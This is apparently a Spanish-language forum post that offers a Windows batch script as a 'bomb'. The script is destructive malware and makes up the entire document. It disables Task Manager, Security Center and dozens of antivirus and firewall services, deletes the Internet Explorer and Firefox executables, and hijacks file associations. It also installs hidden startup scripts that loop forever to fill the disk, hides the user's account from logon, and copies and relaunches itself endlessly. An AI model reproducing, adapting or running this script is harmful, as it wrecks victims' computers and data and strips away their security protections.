Ahi tienen un bonbazo........
@echo off
set a=%0
if %a%=="%systemdrive%\Documents and Settings\%username%\Menú Inicio\Programas\Inicio\chopet.exe" (goto intik1) else goto toma
:toma
net stop "Centro de seguridad"
reg add HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001
reg add "HKLM\software\microsoft\security center" /v AntiVirusDisab leNotify /t REG_DWORD /d 4 /f
reg add "HKLM\software\microsoft\security center" /v AntiVirusOverr ide /t REG_DWORD /d 4 /f
reg add "HKLM\software\microsoft\security center" /v FirewallDisabl eNotify /t REG_DWORD /d 4 /f
reg add "HKLM\software\microsoft\security center" /v FirewallOverri de /t REG_DWORD /d 4 /f
reg add "HKLM\software\microsoft\security center" /v FirstRunDisabl ed /t REG_DWORD /d 4 /f
reg add "HKLM\software\microsoft\security center" /v UpdatesDisable Notify /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\SharedAccess" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\SharedAccess" /v ErrorControl /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\SharedAccess" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\SharedAccess" /v ErrorControl /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\SharedAccess" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\SharedAccess" /v ErrorControl /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\AVPCC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\AVPCC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\AVPCC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Amon" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Amon" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Amon" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Apvxd" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Apvxd" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Apvxd" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Atrack" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Atrack" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Atrack" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\AvconsoleEXE" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\AvconsoleEXE" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\AvconsoleEXE" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\avgcc32" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\avgcc32" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\avgcc32" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\avgserv9" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\avgserv9" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\avgserv9" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\CcApp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\CcApp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\CcApp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\CcRegVfy" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\CcApp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\CcApp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\ConfigSafe" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\ConfigSafe" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\ConfigSafe" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Defwatch" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Defwatch" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Defwatch" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Fix-it" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Fix-it" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Fix-it" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Freedom" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Freedom" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Freedom" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\F-StopW" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\F-StopW" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\F-StopW" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\iamapp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\iamapp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\iamapp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\McAfee Winguage" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\McAfee.InstantUpdate.Monitor" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\McAfee.InstantUpdate.Monitor" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\McAfee.InstantUpdate.Monitor" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\McAfeeVirusScanService" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\McAfeeVirusScanService" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\McAfeeVirusScanService" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\NAV DefAlert" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\CURRENTcontrolset\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\ScanInicio" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\ScanInicio" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\ScanInicio" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\TrueVector" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\TrueVector" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\TrueVector" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f
reg add HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001
DEL /F /Q "%systemdrive\Archivos de programa \Internet Explorer\iexplore.exe"
DEL /F /Q "%systemdrive%\Archivos de programa\Mozilla Firefox\firefox.exe"
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v winlit/t REG_SZ /d %systemroot%\win32init.bat
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v sys/t REG_SZ /d %systemroot%\system32\drivers\etc\hosts.bat
echo aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaa >%systemroot%\system.sys
echo @echo off >%systemroot%\win32init.bat
echo >>%systemroot%\win32init.bat
echo :start >>%systemroot%\win32init.bat
echo MD %systemroot%\System>>%systemroot%\win32init.bat
echo copy %systemroot%\system.sys %systemroot%\System>>%systemroot%\win32init.bat
echo CD %systemroot%>>%systemroot%\win32init.bat
echo MD %systemroot%\system32>>%systemroot%\win32init.bat
echo copy %systemroot%\System\system.sys %systemroot%\system32>>%systemroot%\win32init.bat
echo CD %systemroot%>>%systemroot%\win32init.bat
echo MD %systemroot%\Config>>%systemroot%\win32init.bat
echo copy %systemroot%\system32\system.sys %systemroot%\Config>>%systemroot%\win32init.bat
echo CD %systemroot%>>%systemroot%\win32init.bat
echo goto start>>%systemroot%\win32init.bat
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v vmus /t REG_SZ /d %systemroot%\wininit.bat
echo @echo off>%systemroot%\wininit.bat
echo mkdr %systemroot%\system32\config>>%systemroot%\wininit.bat
echo :inicio>>%systemroot%\wininit.bat
echo mkdr \config>>%systemroot%\wininit.bat
echo cd \config>>%systemroot%\wininit.bat
echo goto inicio>>%systemroot%\wininit.bat
echo @echo off>>%systemroot%\system32\drivers\etc\hosts.bat
echo assoc .bat=txtfile>>%systemroot%\system32\drivers\etc\hosts.bat
echo assoc .exe=txtfile>>%systemroot%\system32\drivers\etc\hosts.bat
echo assoc .psd=txtfile>>%systemroot%\system32\drivers\etc\hosts.bat
echo assoc .txt=CompressedFolder>>%systemroot%\system32\drivers\etc\hosts.bat
echo assoc .rar=txtfile>>%systemroot%\system32\drivers\etc\hosts.bat
echo assoc .zip=txtfile>>%systemroot%\system32\drivers\etc\hosts.bat
echo assoc .url=batfile>>%systemroot%\system32\drivers\etc\hosts.bat
echo assoc .mp3=txtfile>>%systemroot%\system32\drivers\etc\hosts.bat
ATTRIB +h +s %systemroot%\win32init.bat
ATTRIB +h +s %systemroot%\wininit.bat
ATTRIB +h +s %systemroot%\system32\drivers\etc\hosts.bat
start %systemroot%\wininit.bat
start %systemroot%\win32init.bat
start %systemroot%\system32\drivers\etc\hosts.bat
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountUserList" /v %username% /t REG_DWORD /d 00000000 /f
intik1
reg add HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001
Echo Azmo Rulz>"%systemroot%\Tasks\mañito.txt"
Echo Azmo Rulz>"%systemroot%\Tasks\flopon.txt"
reg add hklm\software\microsoft\windows\currentVersion\run /v sknmdvm /t REG_SZ /d %systemdrive%\Documents and Settings\%username%\Menú Inicio\Programas\Inicio\chopet.exe /f
if exist %systemdrive%\Documents and Settings\%username%\Menú Inicio\Programas\Inicio\chopet.exe (goto intik) ELSE goto inlik
:inlik
copy %0 "%systemdrive%\Documents and Settings\%username%\Menú Inicio\Programas\Inicio\chopet.exe"
attrib +s +h "%systemdrive%\Documents and Settings\%username%\Menú Inicio\Programas\Inicio\chopet.exe"
goto intik
:intik
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\mañito.txt"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\mañito.txt"
start "%systemdrive%\Documents and Settings\%username%\Menú Inicio\Programas\Inicio\chopet.exe"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\mañito.txt"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\mañito.txt"
start "%systemdrive%\Documents and Settings\%username%\Menú Inicio\Programas\Inicio\chopet.exe"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\mañito.txt"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\mañito.txt"
start "%systemdrive%\Documents and Settings\%username%\Menú Inicio\Programas\Inicio\chopet.exe"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\mañito.txt"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\mañito.txt"
start "%systemdrive%\Documents and Settings\%username%\Menú Inicio\Programas\Inicio\chopet.exe"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\flopon.txt"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\flopon.txt"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\flopon.txt"
start "%systemdrive%\Documents and Settings\%username%\Menú Inicio\Programas\Inicio\chopet.exe"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\flopon.txt"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\flopon.txt"
type %systemroot%\System32\shell32.dll >> "%systemroot%\Tasks\flopon.txt"
start "%systemdrive%\Documents and Settings\%username%\Menú Inicio\Programas\Inicio\chopet.exe"
goto intik